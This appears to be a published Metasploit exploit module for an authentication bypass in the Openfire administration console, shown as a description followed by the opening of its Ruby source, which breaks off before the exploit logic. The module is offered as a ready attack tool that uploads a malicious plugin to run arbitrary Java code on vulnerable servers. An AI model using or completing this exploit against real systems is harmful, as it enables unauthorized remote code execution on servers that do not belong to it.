Openfire Admin Console Authentication Bypass

This Metasploit module exploits an authentication bypass vulnerability in the administration console of Openfire servers. By using this vulnerability, it is possible to upload and execute a malicious Openfire plugin on the server and run arbitrary Java code. This Metasploit module has been tested against Openfire 3.6.0a. It is possible to remove the uploaded plugin after execution; however, this might leave the server in an unstable state, making re-exploitation difficult. You might want to do this manually.


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex/zip'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  HttpFingerprint = { :pattern => [ /(Jetty)/ ] }

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Openfire Admin Console Authentication Bypass',
      'Description' => %q{
        This module exploits an authentication bypass vulnerability in the administration
        console of Openfire servers. By using this vulnerability it is possible to
        upload/execute a malicious Openfire plugin on the server and execute arbitrary Java
        code. This module has been tested against Openfire 3.6.0a.